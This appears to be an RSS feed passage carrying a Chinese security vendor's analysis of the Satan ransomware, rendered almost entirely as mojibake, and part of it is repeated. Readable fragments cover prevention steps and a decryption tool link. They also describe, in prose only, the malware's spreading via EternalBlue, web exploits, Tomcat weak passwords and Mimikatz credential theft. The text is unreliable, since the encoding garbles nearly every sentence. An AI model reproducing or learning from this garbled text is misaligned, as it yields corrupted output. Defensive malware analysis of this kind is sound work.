虽然永æ’之è“å·²ç»è¿‡åŽ»å¾ˆä¹…ï¼Œä½†æ˜¯å›½å†…å¾ˆå¤šç”¨æˆ·å‡ºäºŽå„ç§åŽŸå› ä¾ç„¶æ²¡æœ‰æ‰“è¡¥ä¸ï¼Œè¿™å¯¼è‡´å¾ˆå¤šä¼ä¸šå˜åœ¨æžå¤§çš„å®‰å…¨éšæ‚£ã€‚“撒旦â€Satan勒索病毒å¯é€šè¿‡æ¼æ´žè¿›è¡Œä¼ æ’,所以ä¸ä¸‹è½½å¯ç–‘程åºå¹¶ä¸èƒ½é˜²æ¢æ„ŸæŸ“ç—…æ¯’ï¼Œå¦‚æžœä¸æ‰“è¡¥ä¸ï¼Œå³ä½¿æ²¡æœ‰ä»»ä½•æ“作åªè¦è”网就有å¯èƒ½è¢«æ”»å‡»ï¼Œå› æ¤åŠæ—¶æ›´æ–°è¡¥ä¸ï¼ŒæŽ’查webæ¼æ´žï¼Œæé«˜æœåС噍安免æ‰èƒ½æœ€å¤§é™åº¦çš„防御æ¤ç±»ç—…毒。 防范措施 Ø  æ›´æ–°æ°¸æ’ä¹‹è“æ¼æ´žè¡¥ä¸ã€‚ Ø  åŠæ—¶æ›´æ–°webæ¼æ´žè¡¥ä¸ï¼Œå‡çº§web组件。 Ø  å¼€å¯é˜²ç«å¢™å…³é—445端å£ã€‚ Ø  å®‰è£…æ€æ¯’è½¯ä»¶ä¿æŒç›‘控开å¯ã€‚ Ø  安装瑞星之剑勒索防御软件。 由于“撒旦â€Satanå‹’ç´¢ç—…æ¯’ä½¿ç”¨å¯¹ç§°åŠ å¯†ç®—æ³•åŠ å¯†ï¼Œå¯†é’¥ç¡¬ç¼–ç 在病毒程åºå’Œè¢«åŠ å¯†æ–‡ä»¶ä¸ï¼Œå› æ¤å¯ä»¥è§£å¯†ã€‚ç›®å‰ï¼Œç‘žæ˜Ÿå·²ç»å¼€å‘出了解密工具,如果用户ä¸äº†æ¤ç—…毒å¯ä¸‹è½½æ¤å·¥å…·æ¢å¤è¢«åŠ å¯†æ–‡ä»¶ï¼Œä¸‹è½½åœ°å€ï¼š http://download.rising.com.cn/for_down/satan/Satan3.x_Encrypt.exe。 解密工具使用方法 1ã€æŸ¥çœ‹å‹’ç´¢ä¿¡æ¯æ˜¯å¦å’ŒæŠ¥å‘Šä¸çš„相åŒï¼› 2ã€åˆ¤æ–è¢«åŠ å¯†æ–‡ä»¶åæ˜¯å¦ä¸º[dbger@protonmail.com]+原始文件å+.dbger,或者[satan_pro@mail.ru]+原始文件å+.satanï¼› 3ã€è¿è¡Œè§£å¯†å·¥å…·ï¼› 4ã€ç‚¹å‡»â€œæ–‡ä»¶â€æŒ‰é’®é€‰ä¸è¦è§£å¯†çš„æ–‡ä»¶å¤¹ï¼› 5ã€ç‚¹å‡»â€œè§£å¯†â€åŽï¼Œè¢«åŠ å¯†æ–‡ä»¶å°†ä¼šè¢«è§£å¯†ï¼› å¯ä»¥çœ‹åˆ°åŒç›®å½•下生æˆäº†è¢«è§£å¯†çš„æ–‡ä»¶ï¼Œä½†æ˜¯åŠ å¯†çš„æ–‡ä»¶å°†ä¼šè¢«ä¿ç•™ï¼Œç”¨æˆ·æŸ¥çœ‹ç¡®å®šæ–‡ä»¶è¢«å®Œå…¨è§£å¯†åŽï¼Œå¯åˆ é™¤è¢«åŠ å¯†æ–‡ä»¶ã€‚åœ¨ä¸ç¡®å®šè§£å¯†æ–‡ä»¶æ˜¯å¦æ£ç¡®çš„æƒ…况下,ä¸è¦è½»æ˜“åˆ é™¤è¢«åŠ å¯†æ–‡ä»¶ï¼Œé˜²æ¢å…¶å®ƒç±»åž‹ç—…毒å˜ç§åŠ å¯†çš„æ–‡ä»¶æ²¡æœ‰è¢«è§£å¯†ã€‚ 6ã€ç›®å‰æœ€æ–°ç‰ˆæœ¬å¯ä»¥è§£å¯†ï¼Œå¦‚é‡åˆ°æ¤ç—…毒的其它å˜ç§æ— 法解密,å¯è”系瑞星公å¸ã€‚ ç—…æ¯’è¯¦ç»†åˆ†æž ç—…æ¯’æ”»å‡»æµç¨‹å¦‚下: 图:病毒攻击æµç¨‹ 新版撒旦Satan勒索病毒è¿è¡ŒåŽä¼šåˆ›å»ºä¸€ä¸ªäº’斥体“SATAN_SCAN_APPâ€ï¼Œå¦‚果已ç»å˜åœ¨åˆ™é€€å‡ºã€‚ 图:创建互斥体 如果ä¸å˜åœ¨åˆ™å¼€å§‹æ‰§è¡Œæ¶æ„功能,从资æºä¸é‡Šæ”¾éœ€è¦ç”¨åˆ°çš„æ¶æ„æ¨¡å—到C:\\Users\\All Users 目录下,包括永æ’ä¹‹è“æ”»å‡»å·¥å…·ã€åŠ å¯†æ¨¡å—ã€å¯†ç 抓å–工具Mimikatz。 释放永æ’ä¹‹è“æ”»å‡»å·¥å…·ï¼Œå…¶ä¸blue.exe 是永æ’ä¹‹è“æ¼æ´žæ”»å‡»å·¥å…·ï¼Œstar.exeæ˜¯è„‰å†²åŒæ˜ŸåŽé—¨æ¤å…¥å·¥å…·ï¼Œdown64.dll æ˜¯æ¼æ´žæ”»å‡»æˆåŠŸåŽæ¤å…¥è¢«æ”»å‡»æœºå™¨çš„åŽé—¨ï¼ŒåŠŸèƒ½æ˜¯ä¸‹è½½å‹’ç´¢ç—…æ¯’æ¯ä½“,其它文件都是攻击工具需è¦ç”¨åˆ°çš„ä¾èµ–库和é…置文件。 图:释放永æ’ä¹‹è“æ”»å‡»å·¥å…· é‡Šæ”¾åŠ å¯†æ¨¡å—ï¼Œè´Ÿè´£åŠ å¯†å—害者计算机ä¸çš„æ–‡ä»¶ï¼Œé’ˆå¯¹åŠ å¯†æ¨¡å—的分æžè¯¦è§ä¸‹æ–‡â€œåŠ å¯†æ¨¡å—分æžâ€éƒ¨åˆ†ã€‚ å›¾ï¼šé‡Šæ”¾åŠ å¯†æ¨¡å— åˆ¤æ–系统架构,释放ä¸åŒç‰ˆæœ¬çš„å¯†ç æŠ“å–工具Mimikatz å¹¶è¿è¡Œï¼Œ64ä½ç³»ç»Ÿä»Žèµ„æºMINI64释放,32ä½ç³»ç»Ÿä»Žèµ„æºMINI32释放,命å为mmkt.exe。 图:释放è¿è¡Œå¯†ç 抓å–工具 å¯†ç æŠ“å–æ¨¡å—è¿è¡ŒåŽä¼šå°†æŠ“å–到的用户åä¿å˜åˆ°ç—…毒目录下的“unameâ€æ–‡ä»¶ä¸ï¼Œå¯†ç ä¿å˜åˆ°â€œupassâ€æ–‡ä»¶ä¸ã€‚è¿è¡ŒåŠ å¯†å‹’ç´¢æ¨¡å—ï¼ŒåŠ å¯†æœ¬æœºæ–‡ä»¶ã€‚ 图:è¿è¡ŒåŠ å¯†æ¨¡å— åˆ›å»ºä¸‰ä¸ªçº¿ç¨‹æ”»å‡»ç½‘ç»œä¸çš„其它机器。 图:创建线程攻击其它机器 线程1ï¼ŒèŽ·å–æœ¬æœºIP地å€ã€‚ 图:èŽ·å–æœ¬æœºIP 循环攻击本地局域网Local_IP/16,16ä½å网掩ç 的网段。例如192.168.1.1——192.168.255.255,覆盖65536å°ä¸»æœºï¼Œè€Œä¸æ˜¯ä»…仅攻击255å°ä¸»æœºï¼Œç›¸å¯¹è€Œè¨€æ”»å‡»èŒƒå›´æ›´å¹¿ã€‚ åˆ›å»ºçº¿ç¨‹ä¼ å…¥è¦æ”»å‡»çš„IP。 图:循环攻击局域网主机 åªæ”»å‡»æŒ‡å®šIPçš„445端å£ã€‚ 图:线程1åªæ”»å‡»445ç«¯å£ çº¿ç¨‹2,攻击局域网ä¸é™¤äº†445端å£ä¹‹å¤–的其它硬编ç çš„226个端å£ã€‚åˆ›å»ºçº¿ç¨‹ï¼Œä¼ å…¥æ”»å‡»IP和端å£ï¼Œä¸Žçº¿ç¨‹1ä¸åŒï¼Œçº¿ç¨‹1åªä¼ 入攻击IP,端å£å›ºå®š445。线程2在创建åçº¿ç¨‹çš„æ—¶å€™ä¼ å…¥äº†æ”»å‡»IPå’Œç«¯å£ ã€‚ 图:使用webæ¼æ´žæ”»å‡»å±€åŸŸç½‘ä¸çš„æœºå™¨ 和线程1相比,线程2å¢žåŠ äº†ä¸€ä¸ªåˆ¤æ–ï¼Œå¦‚æžœä¼ å…¥çš„ç«¯å£æ˜¯445,则执行永æ’ä¹‹è“æ¼æ´žæ”»å‡»ï¼Œå¦åˆ™æ‰§è¡Œwebæ¼æ´žæ”»å‡»ï¼Œä¸è¿‡é’ˆå¯¹445端å£çš„æ°¸æ’ä¹‹è“æ”»å‡»ä¸ä¼šç”Ÿæ•ˆï¼Œå› 为硬编ç çš„226个端å£ä¸ä¸åŒ…å«445端å£ï¼Œå³ä½¿åŒ…å«ï¼Œä¸Šå±‚函数也ä¸ä¼šä¼ 递445端å£ã€‚å› ä¸ºçº¿ç¨‹1å°±å¯ä»¥å®Œæˆå±€åŸŸç½‘çš„445ç«¯å£æ”»å‡»äº†ï¼Œæ¤å¤„å°±ä¸ç”¨å†æ”»å‡»äº†ã€‚æ¤ç—…毒旧版本的硬编ç 端å£åˆ—表ä¸åŒ…å«445端å£ã€‚新版本的端å£åˆ—è¡¨ä¿®æ”¹äº†ï¼Œä½†æ˜¯è¿™é‡Œçš„ä»£ç æ²¡æœ‰ä¿®æ”¹ï¼Œå› æ¤è¿™é‡Œçš„åˆ¤æ–æ˜¾å¾—有些多余。 图:判æ–ç«¯å£æ‰§è¡Œæ”»å‡» æ¤å¤–在执行web攻击之å‰ä¼šè®¾ç½®ä¸€ä¸ªæ ‡å¿—ä½ï¼Œå¦‚æžœç«¯å£æ˜¯443或8443åˆ™å°†æ ‡å¿—ä½è®¾ç½®ä¸º1,目的是拼凑攻击报文时,区分http还是https。httpsæœåŠ¡é»˜è®¤443端å£ï¼Œtomcatçš„httpsæœåŠ¡éœ€è¦8443端å£ã€‚ 图:拼凑攻击报文 之所以没有固定端å£ï¼Œå¯¹åŒä¸€ä¸ªIP使用ä¸åŒçš„端å£å¾ªçŽ¯æ”»å‡»226æ¬¡ï¼Œæ˜¯å› ä¸ºç½‘ç»œä¸æœ‰äº›æœºå™¨æ²¡æœ‰æ‰“è¡¥ä¸ï¼Œä½†æ˜¯ä¼šå°†å„ç§webæœåŠ¡çš„é»˜è®¤ç«¯å£å·ä¿®æ”¹ä¸ºå…¶å®ƒç«¯å£å·ï¼Œä½œä¸ºæ¼æ´žç¼“è§£æŽªæ–½ã€‚æ”»å‡»è€…é€šè¿‡è¿™ç§æ–¹å¼ç»•过缓解措施。这也为我们æäº†ä¸ªé†’,缓解措施很有å¯èƒ½è¢«ç»•è¿‡ï¼ŒæŠŠæ¼æ´žå½»åº•ä¿®å¤æ‰èƒ½æ›´å¤§é™åº¦çš„é¿å…被攻击。 硬编ç 的内置端å£åˆ—表: 图:硬编ç 的攻击端å£åˆ—表 线程3和线程2çš„åŒºåˆ«ä¸»è¦æ˜¯çº¿ç¨‹2攻击的是局域网IP,线程3攻击的是内置的互è”网IP,病毒内置了大é‡çš„IPæ®µï¼Œå¾ªçŽ¯éšæœºé€‰å–攻击。 图:循环攻击内置的IP段 从内置的硬编ç çš„IPä¸ï¼Œéšæœºé€‰å–å°†è¦æ”»å‡»çš„IPåœ°å€æ®µã€‚ å›¾ï¼šéšæœºé€‰å– 线程3的攻击函数和线程2相åŒï¼Œæ”»å‡»æ¯ä¸ªIP时,都会循环攻击硬编ç çš„226个端å£ï¼ŒåŒæ ·ç”±äºŽå†…置的编ç 表ä¸ä¸å«æœ‰445端å£ï¼Œæ”»å‡»äº’è”ç½‘çš„çº¿ç¨‹ä¹Ÿæ— æ³•å¯¹445端å£å‘èµ·æ°¸æ’ä¹‹è“æ”»å‡»ï¼Œåªä¼šå‘指定的IPå‘èµ·web攻击。 图:循环攻击指定的IPç«¯å£ å›¾ï¼šåˆ¤æ–ç«¯å£æ‰§è¡Œæ”»å‡» æ°¸æ’ä¹‹è“æ”»å‡»ï¼Œæ¼æ´žè§¦å‘åŽä¼šå°†down64.dllæ¤å…¥åˆ°è¢«æ”»å‡»æœºå™¨ã€‚ 图:永æ’ä¹‹è“æ”»å‡»   down64.dll的功能是è”网下载è¿è¡Œç—…毒æ¯ä½“ï¼Œè¢«æ”»å‡»æœºå™¨ä¸æ¯’åŽï¼Œåˆä¼šå¾ªçŽ¯åŒæ ·çš„æ“ä½œï¼ŒåŠ å¯†æœ¬æœºæ–‡ä»¶å‹’ç´¢ï¼Œæ”»å‡»å…¶å®ƒæœºå™¨ã€‚ webæ”»å‡»åˆ©ç”¨äº†å¤šç§æ¼æ´žï¼Œæ–‡ä»¶ä¸Šä¼ æ¼æ´žã€‚ å›¾ï¼šæ–‡ä»¶ä¸Šä¼ æ¼æ´ž tomcatå¼±å£ä»¤æ”»å‡»ã€‚ 图:tomcatå¼±å£ä»¤æ¼æ´ž CVE-2017-10271  WebLogic WLSç»„ä»¶æ¼æ´žã€‚ 图:WebLogic WLSç»„ä»¶æ¼æ´ž CVE-2017-12149  JBOOS ååºåˆ—åŒ–æ¼æ´žã€‚ 图:JBOOS ååºåˆ—åŒ–æ¼æ´ž åŠ å¯†æ¨¡å—分æžï¼ŒSatan勒索病毒主è¦é’ˆå¯¹æ•°æ®æ–‡ä»¶è¿›è¡ŒåŠ å¯†ï¼ŒåŠ å¯†åŽè¿½åŠ æ–‡ä»¶åŽç¼€ä¸ºâ€œ.dbgerâ€ã€‚ å›¾ï¼šè¢«åŠ å¯†æ–‡ä»¶çš„çŽ°è±¡ 勒索模å—è¿è¡ŒåŽï¼Œå°è¯•对所有驱动器é历文件,排除以下目录: 表:病毒排除的目录 图:病毒ä¸åŠ å¯†çš„ç›®å½• 当为如下åŽç¼€æ—¶ï¼Œä¸ä¼šåŠ å¯†ï¼š è¡¨æ ¼ï¼šç—…æ¯’æŽ’é™¤çš„åŽç¼€ 图:病毒ä¸åŠ å¯†çš„æ–‡ä»¶ç±»åž‹ ç„¶åŽåˆ›å»ºçº¿ç¨‹å¯¹éåŽ†åˆ°çš„æ–‡ä»¶è¿›è¡ŒåŠ å¯†ï¼Œç—…æ¯’è¿˜ä¼šå°è¯•å…³é—SQL相关æœåŠ¡é˜²æ¢æ–‡ä»¶è¢«å ç”¨æ— æ³•åŠ å¯†ã€‚ 图:关é—SQLæœåŠ¡ […]]]></description>
601 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">近日,瑞星å¨èƒæƒ…报平å°å‘现多起国内用户感染“撒旦â€Satan勒索病毒事件。æ®ç‘žæ˜Ÿå®‰å…¨ç ”究人员介ç»ï¼Œè¯¥ç—…毒è¿è¡ŒåŽä¼šåР坆å—å®³è€…è®¡ç®—æœºæ–‡ä»¶ï¼ŒåŠ å¯†å®ŒæˆåŽä¼šç”¨ä¸è‹±éŸ©ä¸‰å›½è¯è¨€ç´¢å–1个比特å¸ä½œä¸ºèµŽé‡‘,并å¨èƒä¸‰å¤©å†…䏿”¯ä»˜å°†ä¸äºˆè§£å¯†ã€‚与以往常è§çš„勒索病毒ä¸åŒï¼Œâ€œæ’’æ—¦â€ä¸ä»…ä¼šå¯¹æ„ŸæŸ“ç—…æ¯’çš„ç”µè„‘ä¸‹æ‰‹ï¼ŒåŒæ—¶ç—…æ¯’è¿˜ä¼šåˆ©ç”¨å¤šä¸ªæ¼æ´žç»§ç»æ”»å‡»å…¶å®ƒç”µè„‘。</b></p>
602<p><img alt="image001.png" src="http://image.3001.net/images/20180720/15320541214800.png!small" width="682" height="512"></p>
603<p style="text-align: center;">图:感染“撒旦â€ç—…毒åŽå¼¹å‡ºçš„勒索窗å£</p>
604<p>ç‘žæ˜Ÿå®‰å…¨ç ”ç©¶äººå‘˜å¯¹æœ€æ–°ç‰ˆæœ¬çš„â€œæ’’æ—¦â€Satan勒索病毒进行了分æžï¼Œå‘现该病毒与以往勒索病毒有较大的ä¸åŒï¼Œâ€œæ’’æ—¦â€Satan勒索病毒ä¸ä»…使用永æ’ä¹‹è“æ¼æ´žæ”»å‡»ï¼Œè¿˜å¢žåŠ äº†å…¶å®ƒçš„æ¼æ´žæ”»å‡»ã€‚åŒ…æ‹¬æ–‡ä»¶ä¸Šä¼ æ¼æ´žã€tomcatå¼±å£ä»¤æ¼æ´žã€WebLogic WLSç»„ä»¶æ¼æ´žã€JBOOS ååºåˆ—åŒ–æ¼æ´žç‰ã€‚</p>
605<p>虽然永æ’之è“å·²ç»è¿‡åŽ»å¾ˆä¹…ï¼Œä½†æ˜¯å›½å†…å¾ˆå¤šç”¨æˆ·å‡ºäºŽå„ç§åŽŸå› ä¾ç„¶æ²¡æœ‰æ‰“è¡¥ä¸ï¼Œè¿™å¯¼è‡´å¾ˆå¤šä¼ä¸šå˜åœ¨æžå¤§çš„å®‰å…¨éšæ‚£ã€‚“撒旦â€Satan勒索病毒å¯é€šè¿‡æ¼æ´žè¿›è¡Œä¼ æ’,所以ä¸ä¸‹è½½å¯ç–‘程åºå¹¶ä¸èƒ½é˜²æ¢æ„ŸæŸ“ç—…æ¯’ï¼Œå¦‚æžœä¸æ‰“è¡¥ä¸ï¼Œå³ä½¿æ²¡æœ‰ä»»ä½•æ“作åªè¦è”网就有å¯èƒ½è¢«æ”»å‡»ï¼Œå› æ¤åŠæ—¶æ›´æ–°è¡¥ä¸ï¼ŒæŽ’查webæ¼æ´žï¼Œæé«˜æœåС噍安免æ‰èƒ½æœ€å¤§é™åº¦çš„防御æ¤ç±»ç—…毒。</p>
606<h3><b>防范措施</b></h3>
607<blockquote><p>Ø æ›´æ–°æ°¸æ’ä¹‹è“æ¼æ´žè¡¥ä¸ã€‚</p>
608<p>Ø åŠæ—¶æ›´æ–°webæ¼æ´žè¡¥ä¸ï¼Œå‡çº§web组件。</p>
609<p>Ø å¼€å¯é˜²ç«å¢™å…³é—445端å£ã€‚</p>
610<p>Ø å®‰è£…æ€æ¯’è½¯ä»¶ä¿æŒç›‘控开å¯ã€‚</p>
611<p>Ø 安装瑞星之剑勒索防御软件。</p>
612</blockquote>
613<p>由于“撒旦â€Satanå‹’ç´¢ç—…æ¯’ä½¿ç”¨å¯¹ç§°åŠ å¯†ç®—æ³•åŠ å¯†ï¼Œå¯†é’¥ç¡¬ç¼–ç 在病毒程åºå’Œè¢«åŠ å¯†æ–‡ä»¶ä¸ï¼Œå› æ¤å¯ä»¥è§£å¯†ã€‚ç›®å‰ï¼Œç‘žæ˜Ÿå·²ç»å¼€å‘出了解密工具,如果用户ä¸äº†æ¤ç—…毒å¯ä¸‹è½½æ¤å·¥å…·æ¢å¤è¢«åŠ å¯†æ–‡ä»¶ï¼Œä¸‹è½½åœ°å€ï¼š</p>
614<p><a href="http://download.rising.com.cn/for_down/satan/Satan3.x_Encrypt.exe">http://download.rising.com.cn/for_down/satan/Satan3.x_Encrypt.exe</a>。</p>
615<h3><b>解密工具使用方法</b></h3>
616<p>1ã€æŸ¥çœ‹å‹’ç´¢ä¿¡æ¯æ˜¯å¦å’ŒæŠ¥å‘Šä¸çš„相åŒï¼›</p>
617<p>2ã€åˆ¤æ–è¢«åŠ å¯†æ–‡ä»¶åæ˜¯å¦ä¸º[dbger@protonmail.com]+原始文件å+.dbger,或者[satan_pro@mail.ru]+原始文件å+.satanï¼›</p>
618<p>3ã€è¿è¡Œè§£å¯†å·¥å…·ï¼›</p>
619<p>4ã€ç‚¹å‡»â€œæ–‡ä»¶â€æŒ‰é’®é€‰ä¸è¦è§£å¯†çš„æ–‡ä»¶å¤¹ï¼›</p>
620<p><img alt="image005.png" src="http://image.3001.net/images/20180720/15320542327520.png!small" width="458" height="150"></p>
621<p>5ã€ç‚¹å‡»â€œè§£å¯†â€åŽï¼Œè¢«åŠ å¯†æ–‡ä»¶å°†ä¼šè¢«è§£å¯†ï¼›</p>
622<p><img alt="image007.png" src="http://image.3001.net/images/20180720/15320542559831.png!small" width="456" height="150"></p>
623<p>å¯ä»¥çœ‹åˆ°åŒç›®å½•下生æˆäº†è¢«è§£å¯†çš„æ–‡ä»¶ï¼Œä½†æ˜¯åŠ å¯†çš„æ–‡ä»¶å°†ä¼šè¢«ä¿ç•™ï¼Œç”¨æˆ·æŸ¥çœ‹ç¡®å®šæ–‡ä»¶è¢«å®Œå…¨è§£å¯†åŽï¼Œå¯åˆ é™¤è¢«åŠ å¯†æ–‡ä»¶ã€‚åœ¨ä¸ç¡®å®šè§£å¯†æ–‡ä»¶æ˜¯å¦æ£ç¡®çš„æƒ…况下,ä¸è¦è½»æ˜“åˆ é™¤è¢«åŠ å¯†æ–‡ä»¶ï¼Œé˜²æ¢å…¶å®ƒç±»åž‹ç—…毒å˜ç§åŠ å¯†çš„æ–‡ä»¶æ²¡æœ‰è¢«è§£å¯†ã€‚</p>
624<p><img alt="image009.png" src="http://image.3001.net/images/20180720/15320542865530.png!small" width="515" height="279"></p>
625<p><img alt="image011.png" src="http://image.3001.net/images/20180720/15320543029693.png!small" width="548" height="307"></p>
626<p>6ã€ç›®å‰æœ€æ–°ç‰ˆæœ¬å¯ä»¥è§£å¯†ï¼Œå¦‚é‡åˆ°æ¤ç—…毒的其它å˜ç§æ— 法解密,å¯è”系瑞星公å¸ã€‚</p>
627<h2><b>病毒详细分æž</b></h2>
628<p>病毒攻击æµç¨‹å¦‚下:</p>
629<p><img alt="image013.png" src="http://image.3001.net/images/20180720/15320543255449.png!small" width="690" height="630"></p>
630<p style="text-align: center;">图:病毒攻击æµç¨‹</p>
631<p>新版撒旦Satan勒索病毒è¿è¡ŒåŽä¼šåˆ›å»ºä¸€ä¸ªäº’斥体“SATAN_SCAN_APPâ€ï¼Œå¦‚果已ç»å˜åœ¨åˆ™é€€å‡ºã€‚</p>
632<p><img alt="image015.png" src="http://image.3001.net/images/20180720/1532054343362.png!small" width="679" height="459"></p>
633<p style="text-align: center;">图:创建互斥体</p>
634<p>如果ä¸å˜åœ¨åˆ™å¼€å§‹æ‰§è¡Œæ¶æ„功能,从资æºä¸é‡Šæ”¾éœ€è¦ç”¨åˆ°çš„æ¶æ„æ¨¡å—到C:\\Users\\All Users 目录下,包括永æ’ä¹‹è“æ”»å‡»å·¥å…·ã€åŠ å¯†æ¨¡å—ã€å¯†ç 抓å–工具Mimikatz。</p>
635<p>释放永æ’ä¹‹è“æ”»å‡»å·¥å…·ï¼Œå…¶ä¸blue.exe 是永æ’ä¹‹è“æ¼æ´žæ”»å‡»å·¥å…·ï¼Œstar.exeæ˜¯è„‰å†²åŒæ˜ŸåŽé—¨æ¤å…¥å·¥å…·ï¼Œdown64.dll æ˜¯æ¼æ´žæ”»å‡»æˆåŠŸåŽæ¤å…¥è¢«æ”»å‡»æœºå™¨çš„åŽé—¨ï¼ŒåŠŸèƒ½æ˜¯ä¸‹è½½å‹’ç´¢ç—…æ¯’æ¯ä½“,其它文件都是攻击工具需è¦ç”¨åˆ°çš„ä¾èµ–库和é…置文件。</p>
636<p><img alt="image017.png" src="http://image.3001.net/images/20180720/15320545623834.png!small" width="690" height="140"><img alt="image019.png" src="http://image.3001.net/images/20180720/15320545623092.png!small" width="690" height="125"><img alt="image021.png" src="http://image.3001.net/images/20180720/15320545625059.png!small" width="690" height="125"><img alt="image023.png" src="http://image.3001.net/images/20180720/15320545624728.png!small" width="690" height="122"><img alt="image025.png" src="http://image.3001.net/images/20180720/15320545626935.png!small" width="690" height="123"><img alt="image027.png" src="http://image.3001.net/images/20180720/1532054563100.png!small" width="690" height="121"><img alt="image029.png" src="http://image.3001.net/images/20180720/15320545638295.png!small" width="690" height="122"><img alt="image031.png" src="http://image.3001.net/images/20180720/15320545639637.png!small" width="690" height="137"><img alt="image033.png" src="http://image.3001.net/images/20180720/15320545632150.png!small" width="690" height="137"><img alt="image035.png" src="http://image.3001.net/images/20180720/15320545639030.png!small" width="690" height="136"><img alt="image037.png" src="http://image.3001.net/images/20180720/153205456387.png!small" width="690" height="135"><img alt="image039.png" src="http://image.3001.net/images/20180720/15320545643175.png!small" width="690" height="122"><img alt="image041.png" src="http://image.3001.net/images/20180720/15320545646960.png!small" width="690" height="121"><img alt="image043.png" src="http://image.3001.net/images/20180720/15320545643899.png!small" width="690" height="124"><img alt="image045.png" src="http://image.3001.net/images/20180720/15320545649785.png!small" width="690" height="123"><img alt="image047.png" src="http://image.3001.net/images/20180720/15320545653393.png!small" width="690" height="124"><img alt="image049.png" src="http://image.3001.net/images/20180720/15320545659578.png!small" width="690" height="121"><img alt="image051.png" src="http://image.3001.net/images/20180720/15320545658019.png!small" width="690" height="136"><img alt="image053.png" src="http://image.3001.net/images/20180720/15320545662235.png!small" width="690" height="135"><img alt="image055.png" src="http://image.3001.net/images/20180720/15320545661509.png!small" width="690" height="135"><img alt="image057.png" src="http://image.3001.net/images/20180720/15320545665865.png!small" width="690" height="139"><img alt="image059.png" src="http://image.3001.net/images/20180720/15320545668256.png!small" width="690" height="136"><img alt="image061.png" src="http://image.3001.net/images/20180720/15320545676398.png!small" width="690" height="137"></p>
637<p style="text-align: center;">图:释放永æ’ä¹‹è“æ”»å‡»å·¥å…·</p>
638<p>é‡Šæ”¾åŠ å¯†æ¨¡å—ï¼Œè´Ÿè´£åŠ å¯†å—害者计算机ä¸çš„æ–‡ä»¶ï¼Œé’ˆå¯¹åŠ å¯†æ¨¡å—的分æžè¯¦è§ä¸‹æ–‡â€œåŠ å¯†æ¨¡å—分æžâ€éƒ¨åˆ†ã€‚</p>
639<p><img alt="image063.png" src="http://image.3001.net/images/20180720/15320545943876.png!small" width="690" height="197"></p>
640<p style="text-align: center;">å›¾ï¼šé‡Šæ”¾åŠ å¯†æ¨¡å—</p>
641<p>判æ–系统架构,释放ä¸åŒç‰ˆæœ¬çš„å¯†ç æŠ“å–工具Mimikatz å¹¶è¿è¡Œï¼Œ64ä½ç³»ç»Ÿä»Žèµ„æºMINI64释放,32ä½ç³»ç»Ÿä»Žèµ„æºMINI32释放,命å为mmkt.exe。</p>
642<p><img alt="image065.png" src="http://image.3001.net/images/20180720/15320546573984.png!small" width="690" height="329"></p>
643<p style="text-align: center;">图:释放è¿è¡Œå¯†ç 抓å–工具</p>
644<p>å¯†ç æŠ“å–æ¨¡å—è¿è¡ŒåŽä¼šå°†æŠ“å–到的用户åä¿å˜åˆ°ç—…毒目录下的“unameâ€æ–‡ä»¶ä¸ï¼Œå¯†ç ä¿å˜åˆ°â€œupassâ€æ–‡ä»¶ä¸ã€‚è¿è¡ŒåŠ å¯†å‹’ç´¢æ¨¡å—ï¼ŒåŠ å¯†æœ¬æœºæ–‡ä»¶ã€‚</p>
645<p><img alt="image067.png" src="http://image.3001.net/images/20180720/15320546985184.png!small" width="436" height="88"></p>
646<p style="text-align: center;">图:è¿è¡ŒåŠ å¯†æ¨¡å—</p>
647<p>创建三个线程攻击网络ä¸çš„其它机器。</p>
648<p><img alt="image069.png" src="http://image.3001.net/images/20180720/15320547388850.png!small" width="502" height="574"></p>
649<p style="text-align: center;">图:创建线程攻击其它机器</p>
650<p>线程1ï¼ŒèŽ·å–æœ¬æœºIP地å€ã€‚</p>
651<p><img alt="image071.png" src="http://image.3001.net/images/20180720/15320547844536.png!small" width="472" height="353"></p>
652<p style="text-align: center;">图:èŽ·å–æœ¬æœºIP</p>
653<p>循环攻击本地局域网Local_IP/16,16ä½å网掩ç 的网段。例如192.168.1.1——192.168.255.255,覆盖65536å°ä¸»æœºï¼Œè€Œä¸æ˜¯ä»…仅攻击255å°ä¸»æœºï¼Œç›¸å¯¹è€Œè¨€æ”»å‡»èŒƒå›´æ›´å¹¿ã€‚</p>
654<p>åˆ›å»ºçº¿ç¨‹ä¼ å…¥è¦æ”»å‡»çš„IP。</p>
655<p><img alt="image073.png" src="http://image.3001.net/images/20180720/15320549149254.png!small" width="596" height="505"><img alt="image075.png" src="http://image.3001.net/images/20180720/15320549147623.png!small" width="616" height="174"></p>
656<p style="text-align: center;">图:循环攻击局域网主机</p>
657<p>åªæ”»å‡»æŒ‡å®šIPçš„445端å£ã€‚</p>
658<p><img alt="image077.png" src="http://image.3001.net/images/20180720/15320549751303.png!small" width="690" height="355"></p>
659<p style="text-align: center;">图:线程1åªæ”»å‡»445端å£</p>
660<p>线程2,攻击局域网ä¸é™¤äº†445端å£ä¹‹å¤–的其它硬编ç çš„226个端å£ã€‚åˆ›å»ºçº¿ç¨‹ï¼Œä¼ å…¥æ”»å‡»IP和端å£ï¼Œä¸Žçº¿ç¨‹1ä¸åŒï¼Œçº¿ç¨‹1åªä¼ 入攻击IP,端å£å›ºå®š445。线程2在创建åçº¿ç¨‹çš„æ—¶å€™ä¼ å…¥äº†æ”»å‡»IPå’Œç«¯å£ ã€‚</p>
661<p><img alt="image079.png" src="http://image.3001.net/images/20180720/15320550162338.png!small" width="675" height="551"></p>
662<p style="text-align: center;">图:使用webæ¼æ´žæ”»å‡»å±€åŸŸç½‘ä¸çš„æœºå™¨</p>
